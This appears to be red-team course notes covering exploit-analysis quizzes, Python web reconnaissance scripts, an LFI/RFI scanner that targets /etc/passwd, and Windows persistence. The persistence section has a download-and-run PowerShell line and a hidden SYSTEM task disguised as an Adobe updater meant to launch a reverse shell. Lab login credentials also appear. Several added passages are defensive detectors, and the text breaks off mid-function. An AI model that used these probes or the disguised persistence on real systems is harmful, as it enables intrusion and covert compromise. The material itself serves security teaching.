joemccray

Red Team 2021

Aug 31st, 2020 (edited)
----------------------Day 1------------------------------

Exploit Analysis

#######################################################
# Open the following web links below as tabs          #
# For each web link answer all of the questions below #
#######################################################
https://www.exploit-db.com/exploits/46762
https://www.exploit-db.com/exploits/46070
https://www.exploit-db.com/exploits/40713
https://www.exploit-db.com/exploits/46458
https://www.exploit-db.com/exploits/40712
https://www.exploit-db.com/exploits/40714
https://www.exploit-db.com/exploits/40680
https://www.exploit-db.com/exploits/40673
https://www.exploit-db.com/exploits/40681
https://www.exploit-db.com/exploits/37731
https://www.exploit-db.com/exploits/31254
https://www.exploit-db.com/exploits/31255
https://www.exploit-db.com/exploits/27703
https://www.exploit-db.com/exploits/27277
https://www.exploit-db.com/exploits/26495
https://www.exploit-db.com/exploits/24557
https://www.exploit-db.com/exploits/39417
https://www.exploit-db.com/exploits/23243



###############################
# Class Exploit Dev Quiz Task #
###############################


EID number:

1. Vulnerable Software Info
a- Target Product Name
b- Target Software version
c- Available for download on exploit-db.com


2. Target platform
a- OS Name (ex: Windows XP)
b- Service pack (ex: SP3)
c- Language pack (ex: English)


3. Exploit info
a- modules imported (ex: sys, re, os)
b- application entry point (ex: TRUN)
c- distance to EIP (ex: 2006)
d- how is code redirection done (ex: JMP ESP, JMP ESI)
e- number of NOPs (ex: 10 * \x90 = 10 NOPs)
f- length of shellcode (ex: 368)
g- bad characters (ex: \x0a\x00\x0d)
h- is the target IP hard-coded
i- what does the shellcode do (ex: bind shell, reverse shell, calc)
j- what is the total buffer length
k- does the exploit do anything to ensure the buffer doesn't exceed a certain length
l- is this a server-side or client-side exploit




######################################
# Exploit Development Scoring System #
######################################

1. Comments
-----------
1a. Has detailed comments (1 point)
1b. Comments target app info (1 point)
1c. Comments target platform info (1 point)
1d. Comments protocol or file spec info (1 point)
1e. Comments program redirection info (1 point)
1f. Comments shellcode info (1 point)


2. Modules/Libraries
--------------------
2a. Uses the correct modules/libraries to properly interact with the protocol or file type (1 point)


3. Program redirection
----------------------
3a. Uses correct program redirection (JMP ESP, CALL ESP, PUSH ESP; RET) from the correct platform for stable program code redirection

4. Shellcode
------------
4a. Tests for bad characters (1 point)
4b. Tests for maximum length of payload (1 point)

5. Exploit stability
--------------------
5a. Uses NOPs correctly
5b. Maps to the protocol or file spec correctly
5c. Uses a stack shift if applicable
5d. Uses the correct EXITFUNC for stability (1 point)
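Quiz items 3c through 3k and scoring items 4a/4b all come down to measurements on the exploit buffer. The following Python example is added here to show those measurements on the classic layout the quiz assumes (junk | EIP overwrite | NOP sled | shellcode); it is not part of the course notes. Every value in it is a constructed placeholder: the return address is a dummy 4-byte marker, the "shellcode" is filler bytes, and the bad-character list and the sizes simply mirror the quiz's own examples.

```python
#!/usr/bin/env python3
"""Measure the quantities the exploit-analysis quiz asks for, on a constructed buffer."""
from typing import Dict, List

# Constructed example values mirroring the quiz examples (distance to EIP 2006,
# 10 NOPs, 368-byte shellcode). None of these are real exploit bytes.
JUNK = b"A" * 2006                     # padding up to the saved return address
EIP_PLACEHOLDER = b"\xde\xad\xbe\xef"  # stands in for a JMP ESP address (placeholder)
NOP_SLED = b"\x90" * 10
SHELLCODE_FILLER = b"\x41" * 368       # placeholder filler, not a real payload
BAD_CHARS = b"\x00\x0a\x0d"            # the bad characters the quiz gives as an example


def build_buffer(junk: bytes, ret: bytes, nops: bytes, shellcode: bytes) -> bytes:
    """Concatenate the stack-overflow layout the quiz describes: junk | EIP | NOPs | shellcode."""
    return junk + ret + nops + shellcode


def find_bad_chars(payload: bytes, bad: bytes) -> List[int]:
    """Return the bad-character values present in the payload (quiz item 3g, score 4a)."""
    return sorted({b for b in payload if b in bad})


def analyze(junk: bytes, ret: bytes, nops: bytes, shellcode: bytes,
            bad: bytes, max_len: int) -> Dict[str, object]:
    """Answer the numeric quiz items for one buffer.

    max_len is the protocol or field limit the exploit must stay under (item 3k / score 4b).
    """
    buf = build_buffer(junk, ret, nops, shellcode)
    return {
        "distance_to_eip": len(junk),                              # 3c
        "nop_count": nops.count(0x90),                             # 3e
        "shellcode_length": len(shellcode),                        # 3f
        "bad_chars_in_shellcode": find_bad_chars(shellcode, bad),  # 3g
        "bad_chars_in_eip": find_bad_chars(ret, bad),              # the EIP bytes matter too
        "total_buffer_length": len(buf),                           # 3j
        "within_max_length": len(buf) <= max_len,                  # 3k / 4b
    }


if __name__ == "__main__":
    for key, value in analyze(JUNK, EIP_PLACEHOLDER, NOP_SLED, SHELLCODE_FILLER,
                              BAD_CHARS, max_len=3000).items():
        print(f"{key}: {value}")
```

When filling in the quiz, compare the numbers the exploit's own comments claim against what this computes from its string constants; a mismatch between the commented offset and the actual padding length is a common reason a published exploit fails on a different service pack.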






----------------------Day 2------------------------------

- I prefer to use PuTTY to SSH into my Linux host.
- You can download PuTTY from here:
- http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

Log in to this server to perform these labs:

Server: 149.28.201.171
Protocol: ssh
Port: 22
user: redteam
pass: redteam!@

If you are on a Mac (https://osxdaily.com/2017/04/28/howto-ssh-client-mac/)

Open a terminal, then type:
-------------------------------
ssh -l redteam 149.28.201.171
-------------------------------

---------------------------Type This-----------------------------------
cd ~/students/
mkdir yourname
cd yourname
-----------------------------------------------------------------------



################################
# Web App Testing with Python3 #
################################




##############################
# Bannergrabbing a webserver #
##############################

---------------------------Type This-----------------------------------
nano bannergrab.py


---------------------------Paste This----------------------------------

#!/usr/bin/env python3
import sys
import socket

# Great reference: https://www.mkyong.com/python/python-3-typeerror-cant-convert-bytes-object-to-str-implicitly/

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("45.63.104.73", 80))
# HTTP/1.1 requires a Host header, and "Connection: close" makes the server
# close the socket after the response, so the recv() loop below terminates
# instead of hanging on a keep-alive connection
s.sendall(("GET / HTTP/1.1\r\nHost: 45.63.104.73\r\nConnection: close\r\n\r\n").encode())

# Collect the response as bytes
response = b""
# or use encode()
#response = "".encode()

while True:
    data = s.recv(4096)
    response += data
    if not data:
        break
s.close()
print(response.decode(errors="replace"))
----------------------------------------------------------------------


---------------------------Type This-----------------------------------
python3 bannergrab.py
-----------------------------------------------------------------------
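bannergrab.py prints the raw response; the banner itself is the Server and X-Powered-By headers inside it. The following Python example, added here and not part of the course notes, parses a raw HTTP/1.x response into status line, headers and body and pulls those headers out. The response bytes are a constructed sample standing in for what recv() would return; the host and version strings in it are made up.

```python
#!/usr/bin/env python3
"""Parse the raw bytes bannergrab.py prints into the fields a banner grab is after."""
from typing import Dict, Tuple

# Constructed sample response, standing in for what recv() returns from a live server
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Mon, 31 Aug 2020 12:00:00 GMT\r\n"
    b"Server: Apache/2.4.29 (Ubuntu)\r\n"
    b"X-Powered-By: PHP/7.2.24\r\n"
    b"Via: 1.1 proxy-a\r\n"
    b"Via: 1.1 proxy-b\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"<html><body>hello</body></html>"
)


def parse_http_response(raw: bytes) -> Tuple[int, str, Dict[str, str], bytes]:
    """Split a raw HTTP/1.x response into (status, reason, headers, body).

    Header names are lower-cased because HTTP header names are case-insensitive,
    and repeated list-valued headers (such as Via) are joined with ", ". The header
    block is decoded as ISO-8859-1, which cannot fail on arbitrary bytes.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/") or not parts[1].isdigit():
        raise ValueError(f"not an HTTP status line: {lines[0]!r}")
    status = int(parts[1])
    reason = parts[2] if len(parts) == 3 else ""
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line or ":" not in line:
            continue  # skip blank or malformed header lines
        name, _, value = line.partition(":")
        name = name.strip().lower()
        value = value.strip()
        headers[name] = f"{headers[name]}, {value}" if name in headers else value
    return status, reason, headers, body


def banner(raw: bytes) -> Dict[str, str]:
    """Return the fingerprinting headers, with a marker for the ones the server omits."""
    _, _, headers, _ = parse_http_response(raw)
    wanted = ("server", "x-powered-by", "via", "x-country-code")
    return {name: headers.get(name, "not disclosed") for name in wanted}


if __name__ == "__main__":
    status, reason, headers, body = parse_http_response(SAMPLE_RESPONSE)
    print(status, reason)
    for name, value in banner(SAMPLE_RESPONSE).items():
        print(f"{name}: {value}")
```

A server that returns "not disclosed" for everything has had ServerTokens / X-Powered-By suppressed, which is the configuration a hardening baseline asks for; a full version string is what the later insecure-configuration checks are looking for.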



########################################
# Testing availability of HTTP methods #
########################################

A very good practice for a penetration tester is to start by listing the various available HTTP methods.
Following is a Python script with the help of which we can connect to the target web server and enumerate the available HTTP methods:

To begin with, we need to import the requests library:

---------------------------
python3
import requests
---------------------------

After importing the requests library, create an array of the HTTP methods we are going to send. We will make use of some standard methods like 'GET', 'POST', 'PUT', 'DELETE', 'OPTIONS' and a non-standard method 'TEST' to check how the web server handles unexpected input.

----------------------------------------------------------------------------
method_list = ['GET', 'POST', 'PUT', 'DELETE', 'OPTIONS', 'TRACE', 'TEST']
----------------------------------------------------------------------------

The following lines are the main loop of the script, which sends one request per method to the web server and prints the method together with the status code and reason phrase.

------------------------------------------------------
for method in method_list:
    req = requests.request(method, 'https://www.google.com')
    print(method, req.status_code, req.reason)
------------------------------------------------------


------------------------------------------------------
for method in method_list:
    req = requests.request(method, 'https://www.darkoperator.com')
    print(method, req.status_code, req.reason)
------------------------------------------------------


------------------------------------------------------
for method in method_list:
    req = requests.request(method, 'https://dvws1.infosecaddicts.com/dvws1/vulnerabilities/xst/xst.php')
    print(method, req.status_code, req.reason)
------------------------------------------------------


------------------------------------------------------
for method in method_list:
    req = requests.request(method, 'http://www.dybedu.com')
    print(method, req.status_code, req.reason)
------------------------------------------------------


The next lines test for the possibility of cross-site tracing (XST) by sending the TRACE method: if the server reflects our own request line back in the response body, it echoes requests, which is what XST relies on.

-------------------------------------------------------------
if method == 'TRACE' and 'TRACE / HTTP/1.1' in req.text:
    print('Cross Site Tracing(XST) is possible')
-------------------------------------------------------------


-------------------------------
exit()
-------------------------------



*** Full code with example url: ***

---------------------------Type This-----------------------------------
nano xst.py


---------------------------Paste This----------------------------------
#!/usr/bin/env python3
import requests
method_list = ['GET', 'POST', 'PUT', 'DELETE', 'OPTIONS', 'TRACE', 'TEST']
for method in method_list:
    req = requests.request(method, 'https://dvws1.infosecaddicts.com/dvws1/vulnerabilities/xst/xst.php')
    print(method, req.status_code, req.reason)
    # the XST check belongs inside the loop, on the response to the TRACE request
    if method == 'TRACE' and 'TRACE / HTTP/1.1' in req.text:
        print('Cross Site Tracing(XST) is possible')

-------------------------------------------------------------------------


After running the above script against a web server, we get a 200 OK response for each method the server accepts, and a 403 Forbidden response if the server explicitly denies the method. When the TRACE request used for the cross-site tracing (XST) test is rejected, we get a 405 Not Allowed response; otherwise the script prints the message 'Cross Site Tracing(XST) is possible'.


---------------------------Type This-----------------------------------
python3 xst.py
-----------------------------------------------------------------------
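To see the three outcomes described above (accepted, denied, reflected) without depending on a live target, the following Python example, added here and not part of the course notes, runs the same method enumeration and TRACE check against a throwaway local server. The server is constructed for the demo: it accepts GET, forbids DELETE, reflects TRACE (the XST-prone behaviour), and leaves every other method to the standard library's default 501 Unsupported method response. It uses http.client from the standard library in place of requests, so it runs offline.

```python
#!/usr/bin/env python3
"""Run xst.py's method enumeration and TRACE check against a local throwaway server."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Dict, Tuple

METHOD_LIST = ['GET', 'POST', 'PUT', 'DELETE', 'OPTIONS', 'TRACE', 'TEST']


class DemoHandler(BaseHTTPRequestHandler):
    """Constructed target: accepts GET, forbids DELETE, reflects TRACE.

    Methods without a do_<METHOD> handler get BaseHTTPRequestHandler's default
    501 Unsupported method response, which is what the non-standard 'TEST'
    method probes for.
    """

    def log_message(self, *args):  # keep the demo quiet
        pass

    def _reply(self, code: int, body: bytes = b"") -> None:
        self.send_response(code)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        self._reply(200, b"ok\n")

    def do_DELETE(self):
        self._reply(403)

    def do_TRACE(self):
        # Echoing the request line back is the behaviour the XST check looks for;
        # a hardened server answers TRACE with 405 instead of reflecting it.
        self._reply(200, self.requestline.encode() + b"\r\n")


def check_methods(host: str, port: int, path: str = "/") -> Dict[str, Tuple[int, str, bool]]:
    """Send each method once; return {method: (status, reason, xst_possible)}."""
    results: Dict[str, Tuple[int, str, bool]] = {}
    for method in METHOD_LIST:
        conn = http.client.HTTPConnection(host, port, timeout=5)
        conn.request(method, path)
        resp = conn.getresponse()
        body = resp.read().decode(errors="replace")
        xst = method == 'TRACE' and 'TRACE / HTTP/1.1' in body
        results[method] = (resp.status, resp.reason, xst)
        conn.close()
    return results


def run_demo() -> Dict[str, Tuple[int, str, bool]]:
    """Start the constructed server on a free port, enumerate it, shut it down."""
    server = HTTPServer(("127.0.0.1", 0), DemoHandler)  # port 0: let the OS pick a free port
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return check_methods("127.0.0.1", server.server_address[1])
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for method, (status, reason, xst) in run_demo().items():
        print(method, status, reason)
        if xst:
            print('Cross Site Tracing(XST) is possible')
```

On the demo server the expected output is 200 for GET, 403 for DELETE, 501 for the unhandled methods, and 200 with the XST message for TRACE; the fix on a real server is to disable TRACE (for example TraceEnable Off in Apache), after which the same script prints 405 for it.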



##########################################
# Foot printing by checking HTTP headers #
##########################################


HTTP headers are found in both requests and responses from the web server. They also carry very important information about servers, which is why a penetration tester is always interested in the information exposed through HTTP headers. Following is a Python script for getting the information about the headers of the web server:

To begin with, let us import the requests library:

------------------------
import requests
------------------------

We need to send a GET request to the web server. The following line of code makes a simple GET request through the requests library.

---------------------------------------------
request = requests.get('enter the URL')
---------------------------------------------

Next, we will generate a list of headers about which you need the information.

---------------------------------------------------------------------------------------------------------------
header_list = ['Server', 'Date', 'Via', 'X-Powered-By', 'X-Country-Code', 'Connection', 'Content-Length']
---------------------------------------------------------------------------------------------------------------

Next is a try and except block: a header missing from the response raises KeyError, which the except branch turns into the 'No Details Found' message.

---------------------------------------------------
for header in header_list:

    try:
        result = request.headers[header]
        print('%s: %s' % (header, result))
    except KeyError:
        print('%s: No Details Found' % header)

---------------------------------------------------




*** Example Full Code: ***

---------------------------Type This-----------------------------------
nano headercheck.py


---------------------------Paste This----------------------------------
#!/usr/bin/env python3
import requests
request = requests.get('https://dvws1.infosecaddicts.com/dvws1/appinfo.php')
header_list = ['Server', 'Date', 'Via', 'X-Powered-By', 'X-Country-Code', 'Connection', 'Content-Length']
for header in header_list:
    try:
        result = request.headers[header]
        print('%s: %s' % (header, result))
    except KeyError:
        print('%s: No Details Found' % header)
----------------------------------------------------------------------------------------------------------------


After running the above script against a web server, we get the values of the headers in the header list. If the response carries no value for a particular header, the script prints 'No Details Found' for it.


---------------------------Type This-----------------------------------
python3 headercheck.py
-----------------------------------------------------------------------


##############################################
# Testing insecure web server configurations #
##############################################

We can use HTTP header information to test for insecure web server configurations. In the following Python script, we use try/except blocks to test the security headers returned by a number of URLs that are saved in a text file named websites.txt.
---------------------------Type This-----------------------------------
nano websites.txt

---------------------------Paste This----------------------------------
https://www.google.com
https://www.cnn.com
https://foxnews.com
https://phpapp.infosecaddicts.com/
https://aspdotnetapp.infosecaddicts.com/
https://dvws1.infosecaddicts.com/
-----------------------------------------------------------------------




---------------------------Type This-----------------------------------
nano insecure_config_check.py


---------------------------Paste This----------------------------------
#!/usr/bin/env python3

# Reference: https://www.keycdn.com/blog/http-security-headers

import requests
urls = open("websites.txt", "r")
for url in urls:
    url = url.strip()
    if not url:
        continue  # skip blank lines in websites.txt
    req = requests.get(url)
    print(url, 'report:')
    try:
        protection_xss = req.headers['X-XSS-Protection']
        if protection_xss != '1; mode=block':
            print('X-XSS-Protection not set properly, it may be possible:', protection_xss)
    except KeyError:
        print('X-XSS-Protection not set, it may be possible')
    try:
        options_content_type = req.headers['X-Content-Type-Options']
        if options_content_type != 'nosniff':
            print('X-Content-Type-Options not set properly:', options_content_type)
    except KeyError:
        print('X-Content-Type-Options not set')
    try:
        transport_security = req.headers['Strict-Transport-Security']
        print('Strict-Transport-Security set:', transport_security)
    except KeyError:
        print('HSTS header not set properly, man in the middle attacks are possible')
    try:
        content_security = req.headers['Content-Security-Policy']
        print('Content-Security-Policy set:', content_security)
    except KeyError:
        print('Content-Security-Policy missing')

-----------------------------------------------------------------------


---------------------------Type This-----------------------------------
python3 insecure_config_check.py
-----------------------------------------------------------------------
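The header footprinting and the insecure-configuration checks above both reduce to rules over a response's header set. The following Python example, added here and not part of the course notes, collects those rules into one offline audit function run over two constructed header sets, a weak one and a hardened one. It goes a little beyond the script above: it also checks that the HSTS max-age is long enough, that clickjacking protection (X-Frame-Options or a CSP frame-ancestors directive) is present, and that Server / X-Powered-By do not disclose version numbers. The header values are made up; the minimum HSTS age is an assumed policy value.

```python
#!/usr/bin/env python3
"""Audit a response's security headers offline: the checks insecure_config_check.py makes, plus a few more."""
import re
from typing import Dict, List, Optional

# Constructed sample header sets, as requests exposes them in req.headers
WEAK_HEADERS = {
    "Server": "Apache/2.4.29 (Ubuntu)",
    "X-Powered-By": "PHP/7.2.24",
    "X-XSS-Protection": "0",
    "Content-Type": "text/html",
}
HARDENED_HEADERS = {
    "Server": "nginx",
    "X-XSS-Protection": "1; mode=block",
    "X-Content-Type-Options": "nosniff",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "Content-Security-Policy": "default-src 'self'",
    "X-Frame-Options": "DENY",
}


def _lookup(headers: Dict[str, str], name: str) -> Optional[str]:
    """Case-insensitive header lookup (requests does this for you; a plain dict does not)."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def audit_security_headers(headers: Dict[str, str], min_hsts_age: int = 15552000) -> List[str]:
    """Return one finding per weak or missing header; an empty list means every check passed.

    min_hsts_age defaults to 180 days (an assumed policy value, not from the course notes).
    """
    findings: List[str] = []

    xss = _lookup(headers, "X-XSS-Protection")
    if xss is None:
        findings.append("X-XSS-Protection not set")
    elif xss.replace(" ", "").lower() != "1;mode=block":
        findings.append(f"X-XSS-Protection not set properly: {xss}")

    cto = _lookup(headers, "X-Content-Type-Options")
    if cto is None:
        findings.append("X-Content-Type-Options not set")
    elif cto.strip().lower() != "nosniff":
        findings.append(f"X-Content-Type-Options not set properly: {cto}")

    hsts = _lookup(headers, "Strict-Transport-Security")
    if hsts is None:
        findings.append("HSTS header not set, downgrade / man-in-the-middle attacks are possible")
    else:
        m = re.search(r"max-age=(\d+)", hsts)
        if not m or int(m.group(1)) < min_hsts_age:
            findings.append(f"HSTS max-age missing or shorter than {min_hsts_age}s: {hsts}")

    csp = _lookup(headers, "Content-Security-Policy")
    if csp is None:
        findings.append("Content-Security-Policy missing")

    if _lookup(headers, "X-Frame-Options") is None and "frame-ancestors" not in (csp or ""):
        findings.append("no X-Frame-Options and no CSP frame-ancestors: clickjacking is possible")

    for name in ("Server", "X-Powered-By"):
        value = _lookup(headers, name)
        if value and re.search(r"\d", value):
            findings.append(f"{name} discloses a version: {value}")

    return findings


if __name__ == "__main__":
    for label, hdrs in (("weak", WEAK_HEADERS), ("hardened", HARDENED_HEADERS)):
        print(label, "report:")
        for finding in audit_security_headers(hdrs) or ["no findings"]:
            print("  -", finding)
```

To use it against live targets, replace the constructed dicts with `requests.get(url).headers`; the function only reads the mapping, so the rest of the script stays the same.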








---------------------------Type This-----------------------------------
nano LFI-RFI.py


---------------------------Paste This----------------------------------

#!/usr/bin/env python3
print("\n### PHP LFI/RFI Detector ###")

import urllib.request, urllib.error, urllib.parse, re, sys

TARGET = "http://45.63.104.73/showfile.php?filename=about.txt"
RFIVULN = "https://raw.githubusercontent.com/gruntjs/grunt-contrib-connect/master/test/fixtures/hello.txt?"
TravLimit = 12

print("==> Testing for LFI vulns..")
TARGET = TARGET.split("=")[0]+"="  ## URL MANIPULATION: keep everything up to the parameter value
for x in range(1, TravLimit):  ## ITERATE THROUGH THE LOOP, one more "../" per pass
    TARGET += "../"
    try:
        source = urllib.request.urlopen((TARGET+"etc/passwd")).read().decode(errors="replace")  ## WEB REQUEST
    except urllib.error.URLError as e:
        print("$$$ We had an Error:", e)
        sys.exit(0)
    if re.search("root:x:0:0:", source):  ## SEARCH FOR TEXT IN SOURCE
        print("!! ==> LFI Found:", TARGET+"etc/passwd")
        break  ## BREAK LOOP WHEN VULN FOUND

print("\n==> Testing for RFI vulns..")
TARGET = TARGET.split("=")[0]+"="+RFIVULN  ## URL MANIPULATION: point the parameter at the remote file
try:
    source = urllib.request.urlopen(TARGET).read().decode(errors="replace")  ## WEB REQUEST
except urllib.error.URLError as e:
    print("$$$ We had an Error:", e)
    sys.exit(0)
if re.search("Hello world", source):  ## SEARCH FOR TEXT IN SOURCE
    print("!! => RFI Found:", TARGET)

print("\nScan Complete\n")  ## DONE
----------------------------------------------------------------------




---------------------------Type This-----------------------------------
python3 LFI-RFI.py
-----------------------------------------------------------------------
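Seen from the web server, the probes LFI-RFI.py sends are short and distinctive: a growing run of "../" ending in etc/passwd, or a parameter value that is itself a URL. The following Python example, added here and not part of the course notes, is the detection side: it parses Apache combined-format access log lines, URL-decodes each query parameter (twice, to catch double encoding) and flags traversal and remote-inclusion attempts. It generalizes slightly beyond the script above by also matching Windows targets (boot.ini, win.ini) and PHP stream wrappers (php://, data://). The log lines, addresses and paths are constructed for the example.

```python
#!/usr/bin/env python3
"""Flag LFI/RFI probes of the kind LFI-RFI.py sends, from web server access-log lines."""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-format log lines (hosts, paths and agents are made up)
SAMPLE_LOG = """\
198.51.100.7 - - [31/Aug/2020:10:00:01 +0000] "GET /showfile.php?filename=about.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [31/Aug/2020:10:00:02 +0000] "GET /showfile.php?filename=../../../../etc/passwd HTTP/1.1" 200 1843 "-" "Python-urllib/3.8"
198.51.100.7 - - [31/Aug/2020:10:00:03 +0000] "GET /showfile.php?filename=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1843 "-" "Python-urllib/3.8"
198.51.100.7 - - [31/Aug/2020:10:00:04 +0000] "GET /showfile.php?filename=https://example.invalid/hello.txt? HTTP/1.1" 200 12 "-" "Python-urllib/3.8"
203.0.113.9 - - [31/Aug/2020:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
SENSITIVE_FILE_RE = re.compile(r"/etc/passwd|boot\.ini|win\.ini", re.IGNORECASE)
REMOTE_SCHEME_RE = re.compile(r"(?:https?|ftp|php|data)://", re.IGNORECASE)


def classify_request(target: str) -> Optional[str]:
    """Return 'lfi', 'rfi' or None for one request target.

    parse_qsl percent-decodes once; the extra unquote() catches double-encoded
    sequences such as %252e%252e%252f.
    """
    query = urlsplit(target).query
    for _, value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote(value)
        if TRAVERSAL_RE.search(decoded) or SENSITIVE_FILE_RE.search(decoded):
            return "lfi"
        if REMOTE_SCHEME_RE.match(decoded):
            return "rfi"
    return None


def scan_log(text: str) -> List[Dict[str, str]]:
    """Return one record per suspicious request: source IP, kind, target and response status."""
    hits: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash on it
        kind = classify_request(m["target"])
        if kind:
            hits.append({"ip": m["ip"], "kind": kind, "target": m["target"], "status": m["status"]})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["kind"].upper()} {hit["status"]} {hit["target"]}')
```

The status code is kept in each record because a 200 on a traversal request is the case worth paging on: it suggests the include actually succeeded, whereas a run of 404s from the same address is a scanner that found nothing.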



Come up with an analysis framework like yesterday's in order to analyze these exploits:
https://www.exploit-db.com/exploits/46487
https://www.exploit-db.com/exploits/48711
https://www.exploit-db.com/exploits/48722
https://www.exploit-db.com/exploits/41976
https://www.exploit-db.com/exploits/46479



----------------------Day 3------------------------------
###############
# Persistence #
###############


---- Scheduled Task Based Persistence ----
1. Scheduled task based on the most commonly occurring event ID
https://github.com/TestingPens/MalwarePersistenceScripts/blob/master/user_event_persistence.ps1



To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell, or go to Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.

---------------------------Type This-----------------------------------
mkdir c:\persistance

cd c:\persistance

(new-object System.Net.WebClient).DownloadFile("https://raw.githubusercontent.com/TestingPens/MalwarePersistenceScripts/master/user_event_persistence.ps1", "c:\persistance\user_event_persistence.ps1")

.\user_event_persistence.ps1
-------------------------------------------------------------------------



- Alternative method:
--------------------
In this case we will not be running PowerShell. We create a scheduled task definition file called "Adobe Flash Player Updater.xml"

- Copy and paste the code below into the "Adobe Flash Player Updater.xml" definition file on the target machine:
- adapt <UserId></UserId> to the SID of the current user if you do not have administrative privileges (wmic useraccount where name='user' get sid)
- adapt <Command>C:\Windows\System32\calc.exe</Command> to your reverse shell executable
- this scheduled task triggers on an event; it can be changed to regular calls (e.g. once an hour)

--------------------------------
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Author>Adobe Systems Incorporated</Author>
    <Description>This task keeps your Adobe Flash Player installation up to date with the latest enhancements and security fixes. If this task is disabled or removed, Adobe Flash Player will be unable to automatically secure your machine with the latest security fixes.</Description>
  </RegistrationInfo>
  <Triggers>
    <EventTrigger>
      <Enabled>true</Enabled>
      <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="Application"&gt;&lt;Select Path="Application"&gt;*[System[EventID=15]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
    </EventTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>S-1-5-18</UserId>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>true</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\calc.exe</Command>
    </Exec>
  </Actions>
</Task>

---------------------------

Now let's create the scheduled task
---------------------------Type This-----------------------------------
schtasks /create /tn "Adobe Updater" /xml "Adobe Flash Player Updater.xml"
-----------------------------------------------------------------------


Sit back and wait for the task to trigger. By the way, we got the correct XML file format by creating a scheduled task and exporting it to an XML file. Then we were able to make some trivial changes to the file and import it.

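The same XML that schtasks imports is what `schtasks /query /xml` exports, so the traits that make the task above work (hidden, running as SYSTEM, firing on a frequent Application event, a vendor name in Author that the command path does not match) can be checked mechanically. The following Python example, added here and not part of the course notes, parses a task definition with the standard library and reports those traits. The embedded XML is a constructed, abridged copy of the definition above; the vendor-mismatch heuristic is this example's own, not a Microsoft rule.

```python
#!/usr/bin/env python3
"""Flag the traits of the task definition above in any exported Task Scheduler XML."""
import re
import xml.etree.ElementTree as ET
from typing import List

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed sample: an abridged copy of the "Adobe Flash Player Updater" definition above
SAMPLE_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Adobe Systems Incorporated</Author></RegistrationInfo>
  <Triggers>
    <EventTrigger>
      <Enabled>true</Enabled>
      <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="Application"&gt;&lt;Select Path="Application"&gt;*[System[EventID=15]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
    </EventTrigger>
  </Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Settings><Hidden>true</Hidden><Enabled>true</Enabled></Settings>
  <Actions Context="Author"><Exec><Command>C:\\Windows\\System32\\calc.exe</Command></Exec></Actions>
</Task>
"""


def _text(root: ET.Element, path: str) -> str:
    """Text of the first element at a namespaced path, or '' when absent."""
    el = root.find(path, NS)
    return (el.text or "").strip() if el is not None else ""


def analyze_task(xml_text: str) -> List[str]:
    """Return human-readable findings; an empty list means none of the checks fired."""
    root = ET.fromstring(xml_text)
    findings: List[str] = []

    if _text(root, "t:Settings/t:Hidden").lower() == "true":
        findings.append("Hidden=true: task is hidden from the Task Scheduler UI")

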